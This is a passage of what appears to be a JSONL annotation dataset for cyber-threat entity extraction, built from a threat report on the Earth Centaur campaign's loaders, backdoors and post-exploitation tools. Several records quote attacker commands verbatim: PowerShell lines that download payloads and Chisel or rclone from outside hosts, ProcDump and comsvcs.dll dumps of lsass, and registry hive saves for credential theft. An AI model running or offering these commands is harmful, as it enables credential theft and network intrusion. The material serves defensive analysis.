1.","entities":[{"id":49869,"label":"threat-actor","start_offset":72,"end_offset":85}],"relations":[],"Comments":[]} -{"id":4030,"text":" We found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server vulnerabilities as entry points, and then installed web shells.","entities":[{"id":49871,"label":"vulnerability","start_offset":96,"end_offset":127},{"id":49872,"label":"vulnerability","start_offset":38,"end_offset":91},{"id":49873,"label":"attack-pattern","start_offset":164,"end_offset":174}],"relations":[{"id":884,"from_id":49872,"to_id":49873,"type":"uses"},{"id":885,"from_id":49871,"to_id":49873,"type":"uses"}],"Comments":[]} -{"id":4031,"text":"Afterward, the .NET loader (detected as Nerapack) and the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the compromised machine.","entities":[{"id":49875,"label":"malware","start_offset":80,"end_offset":113},{"id":49874,"label":"malware","start_offset":40,"end_offset":48},{"id":49876,"label":"malware","start_offset":118,"end_offset":128}],"relations":[{"id":887,"from_id":49875,"to_id":49876,"type":"duplicate-of"},{"id":888,"from_id":49874,"to_id":49876,"type":"delivers"}],"Comments":[]} -{"id":4032,"text":"Then, depending on the victims, the threat actors dropped different types of second-stage backdoors, such as ChiserClient and SmileSvr.","entities":[{"id":49877,"label":"malware","start_offset":109,"end_offset":121},{"id":49878,"label":"malware","start_offset":126,"end_offset":134}],"relations":[],"Comments":[]} -{"id":4033,"text":"After exploiting the victim's environments successfully, the threat actors start Active Directory (AD) discovery and spread their tools via Server Message Block (SMB).","entities":[],"relations":[],"Comments":[]} -{"id":4034,"text":"Then, they use intranet penetration tools to build the connection between the victim’s intranet and their command-and-control (C&C) servers.","entities":[],"relations":[],"Comments":[]} -{"id":4035,"text":"We go into further detail about these stages in our analysis.","entities":[],"relations":[],"Comments":[]} -{"id":4036,"text":" Figure 1. Stages of Earth Centaur’s intrusion process Technical Analysis of Earth Centaur’s Tools and Techniques Stage 1: Loaders","entities":[{"id":49880,"label":"threat-actor","start_offset":87,"end_offset":100},{"id":49879,"label":"threat-actor","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4037,"text":"After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.exe' \"%temp%\/dfmanager.exe\"}\" C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.bin' \"C:\\Users\\\\AppData\\Local\\Temp\/dfmanager.bin\"}\"","entities":[{"id":49882,"label":"attack-pattern","start_offset":92,"end_offset":102},{"id":49888,"label":"FILEPATH","start_offset":385,"end_offset":405},{"id":49891,"label":"URL","start_offset":566,"end_offset":618},{"id":49889,"label":"FILEPATH","start_offset":409,"end_offset":466},{"id":49883,"label":"tools","start_offset":113,"end_offset":122},{"id":49884,"label":"malware","start_offset":182,"end_offset":190},{"id":49885,"label":"threat-actor","start_offset":10,"end_offset":23},{"id":49886,"label":"FILEPATH","start_offset":228,"end_offset":285},{"id":49887,"label":"URL","start_offset":346,"end_offset":382},{"id":49881,"label":"vulnerability","start_offset":68,"end_offset":87},{"id":49890,"label":"URL","start_offset":527,"end_offset":563}],"relations":[{"id":889,"from_id":49885,"to_id":49881,"type":"exploits"},{"id":890,"from_id":49885,"to_id":49882,"type":"uses"},{"id":891,"from_id":49885,"to_id":49883,"type":"uses"},{"id":892,"from_id":49883,"to_id":49884,"type":"downloads"}],"Comments":[]} -{"id":4038,"text":"After our long-term monitoring, we observed that there are two different decryption algorithms (DES or AES) used in Nerapack to decrypt the payload.","entities":[{"id":49892,"label":"malware","start_offset":116,"end_offset":124}],"relations":[],"Comments":[]} -{"id":4039,"text":"Moreover, in its newer version, it uses a technique called “Timestomping.”","entities":[],"relations":[],"Comments":[]} -{"id":4040,"text":"Timestomping is when the timestamp of the payload file (.bin) is altered to make it harder for incident response analysts to find it.","entities":[],"relations":[],"Comments":[]} -{"id":4041,"text":" Figure 2. Timestomping used on the bin file The decryption key is used as an argument of Nerapack and various keys are used on different victims.","entities":[{"id":49893,"label":"malware","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} -{"id":4042,"text":"It is a simple but effective technique that makes security analysis more difficult and also ensures that only their operators can use the tools.","entities":[],"relations":[],"Comments":[]} -{"id":4043,"text":"The command for execution is shown as here: > Nerapack.exe {base64 encoded key}","entities":[{"id":49894,"label":"FILEPATH","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4044,"text":"Fortunately, we were still able to collect the decryption key in some cases and we decrypted the payload successfully.","entities":[],"relations":[],"Comments":[]} -{"id":4045,"text":"Based on our current cases, the decrypted payload is Quasar RAT.","entities":[{"id":12265,"label":"malware","start_offset":53,"end_offset":63}],"relations":[],"Comments":[]} -{"id":4046,"text":"After the payload is deployed, the actors can continue further malicious actions through Quasar RAT.","entities":[{"id":49895,"label":"malware","start_offset":89,"end_offset":99}],"relations":[],"Comments":[]} -{"id":4047,"text":"Stage 2: Backdoors","entities":[],"relations":[],"Comments":[]} -{"id":4048,"text":"After further analysis, we found that the threat group developed multiple backdoors capable of communication via common network protocols.","entities":[],"relations":[],"Comments":[]} -{"id":4049,"text":"We think this indicates that it has the capability to bypass network security systems by using these common protocols to transfer data.","entities":[{"id":49896,"label":"attack-pattern","start_offset":54,"end_offset":85}],"relations":[],"Comments":[]} -{"id":4050,"text":"We also found that the group tries to launch various backdoors per victim.","entities":[{"id":49897,"label":"attack-pattern","start_offset":38,"end_offset":62}],"relations":[],"Comments":[]} -{"id":4051,"text":"Furthermore, it also tends to use existing frameworks to make customized backdoors.","entities":[{"id":49898,"label":"attack-pattern","start_offset":57,"end_offset":82}],"relations":[],"Comments":[]} -{"id":4052,"text":"By using existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.","entities":[],"relations":[],"Comments":[]} -{"id":4053,"text":"ChiserClient","entities":[{"id":12272,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4054,"text":"After the backdoor is launched, it will decrypt the embedded C&C configuration via AES (CTR mode) algorithm for the following connection.","entities":[],"relations":[],"Comments":[]} -{"id":4055,"text":"In the configuration, there are three C&C addresses and corresponding port numbers.","entities":[],"relations":[],"Comments":[]} -{"id":4056,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":4057,"text":"Decrypted C&C configuration ","entities":[],"relations":[],"Comments":[]} -{"id":4058,"text":"In the first connection, ChiserClient will append the host name of the compromised host for check-in purposes.","entities":[{"id":49899,"label":"malware","start_offset":25,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4059,"text":"Then, it will keep running on the hosts and wait for further commands from the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":4060,"text":"ChiserClient is installed as a system service to allow the threat actors access to higher privileges and keep persistence on the compromised host.","entities":[{"id":49900,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4061,"text":"The capability of ChiserClient is shown in the following table: Command code Function 0x10001","entities":[{"id":12290,"label":"malware","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4062,"text":"Write specified file 0x10002","entities":[],"relations":[],"Comments":[]} -{"id":4063,"text":"Download File 0x10003","entities":[],"relations":[],"Comments":[]} -{"id":4064,"text":"Read specified file 0x10004","entities":[],"relations":[],"Comments":[]} -{"id":4065,"text":"No Action 0x10005","entities":[],"relations":[],"Comments":[]} -{"id":4066,"text":"Open a command shell for command execution ","entities":[],"relations":[],"Comments":[]} -{"id":4067,"text":"HTShell HTShell is a simple backdoor that is developed using the Mongoose framework (version 6.15).","entities":[{"id":49901,"label":"malware","start_offset":0,"end_offset":7},{"id":49902,"label":"malware","start_offset":8,"end_offset":15},{"id":49903,"label":"tools","start_offset":65,"end_offset":98}],"relations":[],"Comments":[]} -{"id":4068,"text":"Mongoose is an Object Data Modeling (ODM) library for MongoDB and Node.Js.","entities":[{"id":49904,"label":"tools","start_offset":0,"end_offset":8},{"id":49905,"label":"SOFTWARE","start_offset":54,"end_offset":61},{"id":49906,"label":"SOFTWARE","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} -{"id":4069,"text":"It is used to translate between objects in code and objects representation in MongoDB.","entities":[{"id":49907,"label":"SOFTWARE","start_offset":78,"end_offset":85}],"relations":[],"Comments":[]} -{"id":4070,"text":"We saw in our cases that the HTShell client will be launched as a system service on the compromised machine and that it will connect to a C&C server.","entities":[{"id":49908,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4071,"text":"HTShell supports importing additional config files.","entities":[{"id":49909,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4072,"text":"We found that the additional config file is located in %PUBLIC%\\Documents\\sdcsvc.dat, and that the content should be encoded by base64.","entities":[{"id":49910,"label":"FILEPATH","start_offset":55,"end_offset":84}],"relations":[],"Comments":[]} -{"id":4073,"text":"If no config file is imported, it will connect to the predefined C&C address.","entities":[],"relations":[],"Comments":[]} -{"id":4074,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":4075,"text":"HTShell hardcoded C&Cs HTShell encodes a hard­-coded string, \"tp===\" with custom base64 and embeds the encoded string in the request cookies.","entities":[{"id":49911,"label":"malware","start_offset":0,"end_offset":7},{"id":49912,"label":"malware","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} -{"id":4076,"text":"If the C&C server receives the request with the special cookie value, it can verify that the request comes from its client applications.","entities":[],"relations":[],"Comments":[]} -{"id":4077,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":4078,"text":"HTShell hardcoded and encoded cookie string in the request header The response handler of HTShell will use “`” as delimiter to split the command code and argument for the received command.","entities":[{"id":49914,"label":"malware","start_offset":94,"end_offset":101},{"id":49913,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4079,"text":"Hence, the command will be this format: `[`] HTShell currently supports three different backdoor functions, shown here: Command code Function 0 Open a command shell for command execution 1","entities":[{"id":49915,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} -{"id":4080,"text":"Upload file 2 Download file","entities":[],"relations":[],"Comments":[]} -{"id":4081,"text":" Customized Lilith RAT ","entities":[{"id":12317,"label":"malware","start_offset":12,"end_offset":22}],"relations":[],"Comments":[]} -{"id":4082,"text":"During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT.","entities":[{"id":49916,"label":"threat-actor","start_offset":30,"end_offset":44},{"id":49917,"label":"malware","start_offset":108,"end_offset":118}],"relations":[{"id":893,"from_id":49916,"to_id":49917,"type":"uses"}],"Comments":[]} -{"id":4083,"text":"We think that this Lilith RAT is a highly modified version of the open-source Lilith RAT.","entities":[{"id":49919,"label":"malware","start_offset":78,"end_offset":88},{"id":49918,"label":"malware","start_offset":19,"end_offset":29}],"relations":[],"Comments":[]} -{"id":4084,"text":"The actors reused part of the codes for command execution, while the C&C protocol is changed to Dropbox HTTPS APIs.","entities":[],"relations":[],"Comments":[]} -{"id":4085,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":4086,"text":"Reused codes from open-source Lilith RAT In order to launch this RAT, the threat actors use a technique called \"Phantom DLL hijacking.\"","entities":[{"id":49920,"label":"malware","start_offset":30,"end_offset":40},{"id":49921,"label":"attack-pattern","start_offset":116,"end_offset":137}],"relations":[],"Comments":[]} -{"id":4087,"text":"In this technique, the RAT will be disguised as the normal wlbsctrl.dll.","entities":[{"id":49922,"label":"FILEPATH","start_offset":59,"end_offset":71}],"relations":[],"Comments":[]} -{"id":4088,"text":"While the Windows service “IKEEXT” is starting, the fake wlbsctrl.dll is loaded and executed with high privilege.","entities":[],"relations":[],"Comments":[]} -{"id":4089,"text":"Furthermore, when Lilith RAT is terminated, it will try to clean itself to prevent being found by investigators.","entities":[{"id":49923,"label":"malware","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} -{"id":4090,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} -{"id":4091,"text":"Self-deletion after execution ","entities":[],"relations":[],"Comments":[]} -{"id":4092,"text":"For the C&C connections, the customized Lilith RAT will first check in to the attacker’s Dropbox and see if the victim host exists.","entities":[{"id":49925,"label":"SOFTWARE","start_offset":89,"end_offset":96},{"id":49924,"label":"malware","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} -{"id":4093,"text":"If not, the hostname and IP address will be collected and appended to the existing compromised hosts’ information.","entities":[],"relations":[],"Comments":[]} -{"id":4094,"text":"All data will then be encrypted and sent back. Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":4095,"text":"The first check-in request to the Dropbox C&C After the check-in request, the backdoor will start to wait for more commands to come in.","entities":[],"relations":[],"Comments":[]} -{"id":4096,"text":"All the request data are formatted to JSON, and they are encrypted by AES and encoded by base64.","entities":[],"relations":[],"Comments":[]} -{"id":4097,"text":"Here is a list of the C&C commands:","entities":[],"relations":[],"Comments":[]} -{"id":4098,"text":" Command Description CMDCommand Executes commands DownloadCloudFile Downloads files UploadCloudFile Uploads files GetDir Lists directories GetDirFile Lists files in a directory DeleteSelf Deletes itself SmileSvr ","entities":[],"relations":[],"Comments":[]} -{"id":4099,"text":"We found that there are two types of SmileSvr.","entities":[],"relations":[],"Comments":[]} -{"id":4100,"text":"The difference between the two variants is the protocol used for communication: ICMP and SSL.","entities":[],"relations":[],"Comments":[]} -{"id":4101,"text":"The threat actors will use an installer to install SmileSvr as a system service and drop a DAT file that contains encoded C&C information.","entities":[],"relations":[],"Comments":[]} -{"id":4102,"text":"In the configuration file, the memory size used for storing C&C address and C&C address will be defined.","entities":[],"relations":[],"Comments":[]} -{"id":4103,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":4104,"text":"Encrypted configuration file ","entities":[],"relations":[],"Comments":[]} -{"id":4105,"text":"The ICMP version of SmileSvr will create an ICMP socket to connect to the specified C&C address, which is defined in a configuration file.","entities":[],"relations":[],"Comments":[]} -{"id":4106,"text":"In each SmileSvr, there is an embedded number (e.g., 10601 in Figure 10.) and this value will be used as sequence number in the sent ICMP packet.","entities":[],"relations":[],"Comments":[]} -{"id":4107,"text":"We think attackers use this value to verify if the incoming packet belongs to their backdoor and filter out the noise.","entities":[],"relations":[],"Comments":[]} -{"id":4108,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} -{"id":4109,"text":"Decrypted configuration file Without knowing the real traffic from the C&C server, we can only speculate on the content of the response based on the receiving function.","entities":[],"relations":[],"Comments":[]} -{"id":4110,"text":"As shown in Figure 11, the content of the response should contain the sequence number used to verify if the received data comes from the correct source and two blocks of encrypted data.","entities":[],"relations":[],"Comments":[]} -{"id":4111,"text":"The data decryption procedure is as follows: First, the encrypted data is decrypted with a one-byte XOR key (0xFF).","entities":[],"relations":[],"Comments":[]} -{"id":4112,"text":"The first of the decrypted content contains a magic number used to check data in the second block, a command code, and the XOR key to decrypt the second set of encrypted content.","entities":[],"relations":[],"Comments":[]} -{"id":4113,"text":"The second set of encrypted content is decrypted with an XOR key (0x99) from the previous decrypted content, and within the decrypted data are instructions for the following procedures.","entities":[],"relations":[],"Comments":[]} -{"id":4114,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":4115,"text":"SmileSvr packet traffic format simulation ","entities":[],"relations":[],"Comments":[]} -{"id":4116,"text":"While analyzing samples, we found that the C&C server was already inactive.","entities":[],"relations":[],"Comments":[]} -{"id":4117,"text":"Without knowing the traffic between SmileSvr and C&C server, we could not fully understand all functions.","entities":[],"relations":[],"Comments":[]} -{"id":4118,"text":"However, most of the backdoor functions are listed here: Command code Function 0x5001","entities":[],"relations":[],"Comments":[]} -{"id":4119,"text":"Opens\/Reads specified file 0x5002 Unknown 0x5004 Opens\/Writes specified file 0x5006","entities":[],"relations":[],"Comments":[]} -{"id":4120,"text":"Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A","entities":[],"relations":[],"Comments":[]} -{"id":4121,"text":"File System Traversal 0x500C","entities":[],"relations":[],"Comments":[]} -{"id":4122,"text":"Checks environment information 0x500E Unknown","entities":[],"relations":[],"Comments":[]} -{"id":4123,"text":"As for the SSL version of SmileSvr, the capability of SSL communication is built by using wolfSSL, which is a lightweight, C-language based SSL\/TLS library.","entities":[],"relations":[],"Comments":[]} -{"id":4124,"text":"The backdoor functions of SSL version SmileSvr are similar to the ICMP ones.","entities":[],"relations":[],"Comments":[]} -{"id":4125,"text":"The threat actors just use it to develop new ways to support data transfer via an encrypted channel.","entities":[],"relations":[],"Comments":[]} -{"id":4126,"text":"Customized Gh0st RAT","entities":[{"id":12418,"label":"malware","start_offset":11,"end_offset":20}],"relations":[],"Comments":[]} -{"id":4127,"text":"In our investigation, we also found a suspicious executable named telegram.exe.","entities":[{"id":49926,"label":"FILEPATH","start_offset":66,"end_offset":78}],"relations":[],"Comments":[]} -{"id":4128,"text":"After analyzing the file, we found that it was a customized version of Gh0st RAT.","entities":[{"id":49927,"label":"malware","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} -{"id":4129,"text":"Compared to the original Gh0st RAT (Gh0st beta 3.6), the difference is that the customized version supports a new function to discover information from active sessions on the host.","entities":[{"id":49928,"label":"malware","start_offset":25,"end_offset":51}],"relations":[],"Comments":[]} -{"id":4130,"text":"All supported functions for the customized Gh0st are shown in the following table: Command code Function 0xC8 Terminates connection 0xCA","entities":[{"id":49929,"label":"malware","start_offset":43,"end_offset":48}],"relations":[],"Comments":[]} -{"id":4131,"text":"File manager to handle file operations 0xCB Screen monitoring 0xCC Opens remote shell for command execution 0XD5 Gets active session information Post","entities":[],"relations":[],"Comments":[]} -{"id":4132,"text":"Exploitation","entities":[],"relations":[],"Comments":[]} -{"id":4133,"text":"After successfully exploiting the vulnerable system, the threat actor will use multiple hacking tools to discover and compromise machines on the victim’s intranet.","entities":[],"relations":[],"Comments":[]} -{"id":4134,"text":"In this stage, we also observed attempts to deploy tools to exfiltrate stolen information.","entities":[],"relations":[],"Comments":[]} -{"id":4135,"text":"During our investigation, we found evidence of specific tools, which we listed in Table 1.","entities":[],"relations":[],"Comments":[]} -{"id":4136,"text":"With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.","entities":[],"relations":[],"Comments":[]} -{"id":4137,"text":" Tool name Purpose Description SharpHound AD Discovery Discovery tool to understand the relationship in an AD environment FRPC Intranet Penetration Fast reverse proxy to help expose a local server behind a NAT or firewall to the internet Chisel Intranet Penetration Fast TCP\/UDP tunnel RClone Exfiltration A command-line program to sync files and directories to and from different cloud storage providers Credential Dumping","entities":[{"id":49930,"label":"attack-pattern","start_offset":406,"end_offset":424},{"id":49931,"label":"tools","start_offset":31,"end_offset":41},{"id":49932,"label":"malware","start_offset":238,"end_offset":244},{"id":49933,"label":"tools","start_offset":286,"end_offset":292}],"relations":[],"Comments":[]} -{"id":4138,"text":"We also observed that the group used multiple legitimate tools to dump credentials on compromised machines.","entities":[],"relations":[],"Comments":[]} -{"id":4139,"text":"It made good use of these tools to achieve its goal and keep its operation hidden and unobstructive.","entities":[],"relations":[],"Comments":[]} -{"id":4140,"text":"For example, the group uses ProcDump.exe (a tool from Windows Sysinternals Suite that creates dumps of the processes in any scenario), which it renamed bootsys.exe: c:\\users\\public\\downloads\\bootsys.exe -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp","entities":[{"id":49934,"label":"FILEPATH","start_offset":28,"end_offset":40},{"id":49938,"label":"FILEPATH","start_offset":220,"end_offset":229},{"id":49936,"label":"FILEPATH","start_offset":165,"end_offset":202},{"id":49937,"label":"FILEPATH","start_offset":230,"end_offset":265},{"id":49935,"label":"FILEPATH","start_offset":152,"end_offset":163}],"relations":[],"Comments":[]} -{"id":4141,"text":"The group dumps credentials stored in registries by using reg.exe: reg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit reg.exe save hklm\\security c:\\windows\\temp\\se.dit reg.exe save hklm\\system c:\\windows\\temp\\sy.dit","entities":[{"id":49940,"label":"FILEPATH","start_offset":146,"end_offset":168},{"id":49941,"label":"FILEPATH","start_offset":169,"end_offset":176},{"id":49944,"label":"FILEPATH","start_offset":219,"end_offset":226},{"id":49947,"label":"FILEPATH","start_offset":67,"end_offset":74},{"id":49939,"label":"REGISTRYKEY","start_offset":137,"end_offset":145},{"id":49942,"label":"REGISTRYKEY","start_offset":182,"end_offset":195},{"id":49943,"label":"FILEPATH","start_offset":196,"end_offset":218},{"id":49945,"label":"REGISTRYKEY","start_offset":232,"end_offset":243},{"id":49946,"label":"FILEPATH","start_offset":244,"end_offset":266},{"id":49948,"label":"REGISTRYKEY","start_offset":80,"end_offset":88},{"id":49949,"label":"FILEPATH","start_offset":89,"end_offset":123},{"id":49950,"label":"FILEPATH","start_offset":124,"end_offset":131}],"relations":[],"Comments":[]} -{"id":4142,"text":"The group would also dump memory from the specified process by using comsvcs.dll: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full Indicator Removal To avoid exposing their footprints to investigators, the threat actors made their own tool to wipe out the event logs on the victimized machine.","entities":[{"id":49954,"label":"tools","start_offset":127,"end_offset":135},{"id":49955,"label":"FILEPATH","start_offset":140,"end_offset":164},{"id":49951,"label":"FILEPATH","start_offset":69,"end_offset":80},{"id":49952,"label":"FILEPATH","start_offset":82,"end_offset":94},{"id":49953,"label":"FILEPATH","start_offset":95,"end_offset":126}],"relations":[],"Comments":[]} -{"id":4143,"text":"By using this tool, they could clean specified event logs and make it hard for investigators to track their operations.","entities":[],"relations":[],"Comments":[]} -{"id":4144,"text":"The usage is as follows: Intranet Penetration","entities":[],"relations":[],"Comments":[]} -{"id":4145,"text":"After successfully exploiting the vulnerable system, threat actors also drop following tools: FRP and Chisel.","entities":[{"id":49957,"label":"tools","start_offset":102,"end_offset":108},{"id":49956,"label":"tools","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} -{"id":4146,"text":"FRP is a fast reverse proxy used to expose a local server behind an NAT or a firewall to the internet.","entities":[{"id":49958,"label":"tools","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4147,"text":"It can read predefined configurations and make the host in the intranet available to users from the internet.","entities":[],"relations":[],"Comments":[]} -{"id":4148,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":4149,"text":"Configuration for FRP fast reverse proxy Chisel is a fast TCP\/UDP tunnel, which is mainly used for passing through firewalls.","entities":[{"id":12469,"label":"malware","start_offset":18,"end_offset":21},{"id":12470,"label":"malware","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} -{"id":4150,"text":"It provides the capability to transport data over HTTP (secured via Secure Shell, aka SSH) and allows threat actors to pass through a firewall and get access to the machine behind the firewall.","entities":[],"relations":[],"Comments":[]} -{"id":4151,"text":"This is used to download reverse proxy Chisel via PowerShell: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https[:]\/\/webadmin[.]mirrorstorage[.]org\/ch.exe', 'ch.exe')\"","entities":[{"id":12475,"label":"malware","start_offset":39,"end_offset":45},{"id":12476,"label":"tools","start_offset":50,"end_offset":60},{"id":49959,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":49960,"label":"URL","start_offset":179,"end_offset":226},{"id":49961,"label":"FILEPATH","start_offset":230,"end_offset":236}],"relations":[],"Comments":[]} -{"id":4152,"text":"This is used to build a connection between inter\/intranet via Chisel: C:\\WINDOWS\\system32\\ch.exe client https[:]\/\/webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks Exfiltration","entities":[{"id":49964,"label":"URL","start_offset":105,"end_offset":149},{"id":49962,"label":"tools","start_offset":62,"end_offset":68},{"id":49963,"label":"FILEPATH","start_offset":71,"end_offset":97}],"relations":[],"Comments":[]} -{"id":4153,"text":"In the previous phase, we observed that the actors use several tools to get the whole picture of the network infrastructure and bypass the firewall.","entities":[],"relations":[],"Comments":[]} -{"id":4154,"text":"Afterward, we observed a PowerShell command used to download an effective tool, Rclone, which is used for exfiltration.","entities":[{"id":12482,"label":"tools","start_offset":25,"end_offset":35},{"id":12484,"label":"tools","start_offset":80,"end_offset":86}],"relations":[],"Comments":[]} -{"id":4155,"text":"It also provides an easy and effective way of copying data to several cloud storage providers.","entities":[],"relations":[],"Comments":[]} -{"id":4156,"text":"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('http:\/\/195[.]123[.]221[.]7:8080\/rclone.exe', 'r.exe')","entities":[{"id":49965,"label":"FILEPATH","start_offset":0,"end_offset":57},{"id":49966,"label":"URL","start_offset":117,"end_offset":159}],"relations":[],"Comments":[]} -{"id":4157,"text":" Based on previous experience, Rclone has frequently been used in ransomware attacks to exfiltrate stolen data.","entities":[{"id":12490,"label":"tools","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4158,"text":"However, it seems that currently, it is not only used in ransomware attacks but also in APT attacks.","entities":[],"relations":[],"Comments":[]} -{"id":4159,"text":"Identifying Features in the Earth Centaur Campaign","entities":[{"id":49967,"label":"campaign","start_offset":28,"end_offset":50}],"relations":[],"Comments":[]} -{"id":4160,"text":"After long-term observation and analysis of the attack campaigns, there was compelling evidence that they were operated by Earth Centaur.","entities":[{"id":49968,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} -{"id":4161,"text":"We found several identifying features of the threat actors within the techniques and tools described in the preceding sections, and we break down the factors in the following.","entities":[],"relations":[],"Comments":[]} -{"id":4162,"text":"Mutex Style","entities":[],"relations":[],"Comments":[]} -{"id":4163,"text":"We found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.","entities":[{"id":49969,"label":"malware","start_offset":95,"end_offset":107}],"relations":[],"Comments":[]} -{"id":4164,"text":"The decoded string is shown in Table 2.","entities":[],"relations":[],"Comments":[]} -{"id":4165,"text":"Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.","entities":[{"id":49970,"label":"threat-actor","start_offset":53,"end_offset":66},{"id":49971,"label":"location","start_offset":79,"end_offset":102}],"relations":[{"id":894,"from_id":49970,"to_id":49971,"type":"located-at"}],"Comments":[]} -{"id":4166,"text":"Table 2. Encoded\/Decoded mutex string Encoded string Decoded string in Chinese English translation vul3ru,6q8 q8 y.3 小傑趴趴走 Jack goes around ji394su3 我愛你 I love you 5ji fu.6cl3g.3zj6m0694 桌球好手福原愛 Excellent table tennis player, Ai Fukuhara Configuration style ","entities":[],"relations":[],"Comments":[]} -{"id":4167,"text":"After analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient mentioned in our previous research on Earth Centaur.","entities":[{"id":12514,"label":"malware","start_offset":20,"end_offset":32},{"id":12515,"label":"malware","start_offset":106,"end_offset":113},{"id":49972,"label":"threat-actor","start_offset":152,"end_offset":166}],"relations":[{"id":895,"from_id":12515,"to_id":49972,"type":"authored-by"},{"id":896,"from_id":12514,"to_id":49972,"type":"authored-by"}],"Comments":[]} -{"id":4168,"text":" Figure 13. Network configuration (Left: ChiserClient","entities":[{"id":12518,"label":"malware","start_offset":45,"end_offset":57}],"relations":[],"Comments":[]} -{"id":4169,"text":"Right: TClient)","entities":[{"id":12519,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4170,"text":" Code Similarity","entities":[],"relations":[],"Comments":[]} -{"id":4171,"text":"After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.","entities":[{"id":49973,"label":"malware","start_offset":95,"end_offset":107},{"id":49974,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[{"id":897,"from_id":49974,"to_id":49973,"type":"uses"}],"Comments":[]} -{"id":4172,"text":"Both share similar codes in configuration decoding, which is shown in Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":4173,"text":"Furthermore, the delimiter that was used in SmileSvr to split different values in configuration files is the same as the one used in YAHAMAM (shown as Figure 15). Figure 14.","entities":[{"id":49976,"label":"malware","start_offset":44,"end_offset":52},{"id":49975,"label":"malware","start_offset":133,"end_offset":140}],"relations":[],"Comments":[]} -{"id":4174,"text":"Configuration decoding function (left: SmileSvr right: Troj_Yahamam) Figure 15. Function used to split different values in configuration file (left: SmileSvr right: Troj_Yahamam)","entities":[{"id":49978,"label":"malware","start_offset":170,"end_offset":182},{"id":49979,"label":"malware","start_offset":154,"end_offset":162},{"id":49980,"label":"malware","start_offset":39,"end_offset":47},{"id":49977,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4175,"text":" Conclusion","entities":[],"relations":[],"Comments":[]} -{"id":4176,"text":"These threat actors are notably sophisticated and well-equipped.","entities":[],"relations":[],"Comments":[]} -{"id":4177,"text":"Looking deeper into the new methods the group uses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while remaining under the radar.","entities":[],"relations":[],"Comments":[]} -{"id":4178,"text":"For example, the group can map their target’s network infrastructure and bypass firewalls.","entities":[{"id":49981,"label":"attack-pattern","start_offset":73,"end_offset":89},{"id":49982,"label":"attack-pattern","start_offset":27,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4179,"text":"It uses backdoors with different protocols, which are deployed depending on the victim.","entities":[{"id":49983,"label":"attack-pattern","start_offset":8,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4180,"text":"It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and 